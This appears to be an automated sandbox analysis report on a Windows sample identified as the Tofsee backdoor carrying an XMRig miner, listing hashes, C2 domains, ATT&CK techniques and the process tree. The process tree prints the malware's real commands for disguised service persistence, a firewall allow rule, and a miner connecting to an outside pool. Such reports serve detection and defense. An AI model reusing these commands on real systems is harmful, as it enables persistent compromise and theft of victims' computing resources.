Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-04-2023 15:03

General

  • Target

    file.exe

  • Size

    213KB

  • MD5

    bedb55ac5c140a2a596d9fcbd822e5a6

  • SHA1

    cbd6195cb310f5e29c199c01180a424340266b80

  • SHA256

    45b56889c1a9cc3a57cd8bce999914ae2199808ad38235dc53c3e9d041865a07

  • SHA512

    be312de3dbf98fc18fabc2970ef13c14d291ed528b502f7937b2efd4491b2df5075ae31f878085af67c679099ebebefa9ea38ef086b4d7c4292a93e5c841d798

  • SSDEEP

    3072:QLw69nh47SsG97WGBbZrV8O38yLTMaOGpID5++qI7iMP:Ah47fKL58qjvMaH/k7iM

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3960
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yqzmgpsq\
      2⤵
        PID:2008
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cowtzmsq.exe" C:\Windows\SysWOW64\yqzmgpsq\
        2⤵
          PID:3848
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create yqzmgpsq binPath= "C:\Windows\SysWOW64\yqzmgpsq\cowtzmsq.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:2888
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description yqzmgpsq "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:320
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start yqzmgpsq
          2⤵
          • Launches sc.exe
          PID:4380
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3508
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 1208
          2⤵
          • Program crash
          PID:4860
      • C:\Windows\SysWOW64\yqzmgpsq\cowtzmsq.exe
        C:\Windows\SysWOW64\yqzmgpsq\cowtzmsq.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3996
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4724
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 528
          2⤵
          • Program crash
          PID:436
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3960 -ip 3960
        1⤵
          PID:2868
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4744 -ip 4744
          1⤵
            PID:4180

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\cowtzmsq.exe
            Filesize

            12.7MB

            MD5

            906aaabfd4ca458423bceb96513c3dcb

            SHA1

            ec7b1b892ec936096f82e91e9d671475736759a1

            SHA256

            e6d87db36aa96b888d5a8bc137c249a2aa3e31ff76046e3b4835b223318af9c8

            SHA512

            a41bb36a5645f29f319ee8c2b9f48d4c8c98594df57057c71f2401b98ec2aa667c3057976ba8cf8bf2d34255a54142f4c406caab4df1f7f046a8962d6eb9089b

          • C:\Windows\SysWOW64\yqzmgpsq\cowtzmsq.exe
            Filesize

            12.7MB

            MD5

            906aaabfd4ca458423bceb96513c3dcb

            SHA1

            ec7b1b892ec936096f82e91e9d671475736759a1

            SHA256

            e6d87db36aa96b888d5a8bc137c249a2aa3e31ff76046e3b4835b223318af9c8

            SHA512

            a41bb36a5645f29f319ee8c2b9f48d4c8c98594df57057c71f2401b98ec2aa667c3057976ba8cf8bf2d34255a54142f4c406caab4df1f7f046a8962d6eb9089b

          • memory/3960-134-0x0000000000640000-0x0000000000653000-memory.dmp
            Filesize

            76KB

          • memory/3960-139-0x0000000000400000-0x00000000004A2000-memory.dmp
            Filesize

            648KB

          • memory/3960-140-0x0000000000640000-0x0000000000653000-memory.dmp
            Filesize

            76KB

          • memory/3996-168-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-169-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-145-0x0000000001010000-0x0000000001025000-memory.dmp
            Filesize

            84KB

          • memory/3996-185-0x00000000037E0000-0x00000000037E7000-memory.dmp
            Filesize

            28KB

          • memory/3996-147-0x0000000001010000-0x0000000001025000-memory.dmp
            Filesize

            84KB

          • memory/3996-149-0x0000000001010000-0x0000000001025000-memory.dmp
            Filesize

            84KB

          • memory/3996-150-0x0000000002C00000-0x0000000002E0F000-memory.dmp
            Filesize

            2.1MB

          • memory/3996-153-0x0000000002C00000-0x0000000002E0F000-memory.dmp
            Filesize

            2.1MB

          • memory/3996-154-0x00000000011E0000-0x00000000011E6000-memory.dmp
            Filesize

            24KB

          • memory/3996-157-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-162-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-161-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-160-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-163-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-164-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-165-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-166-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-141-0x0000000001010000-0x0000000001025000-memory.dmp
            Filesize

            84KB

          • memory/3996-167-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-144-0x0000000001010000-0x0000000001025000-memory.dmp
            Filesize

            84KB

          • memory/3996-170-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-171-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-172-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-173-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-177-0x00000000037D0000-0x00000000037D5000-memory.dmp
            Filesize

            20KB

          • memory/3996-176-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-175-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-174-0x00000000011F0000-0x0000000001200000-memory.dmp
            Filesize

            64KB

          • memory/3996-180-0x00000000037D0000-0x00000000037D5000-memory.dmp
            Filesize

            20KB

          • memory/3996-181-0x0000000008200000-0x000000000860B000-memory.dmp
            Filesize

            4.0MB

          • memory/3996-184-0x0000000008200000-0x000000000860B000-memory.dmp
            Filesize

            4.0MB

          • memory/4724-189-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-194-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-195-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-196-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-198-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-199-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-200-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4724-197-0x0000000000800000-0x00000000008F1000-memory.dmp
            Filesize

            964KB

          • memory/4744-146-0x0000000000400000-0x00000000004A2000-memory.dmp
            Filesize

            648KB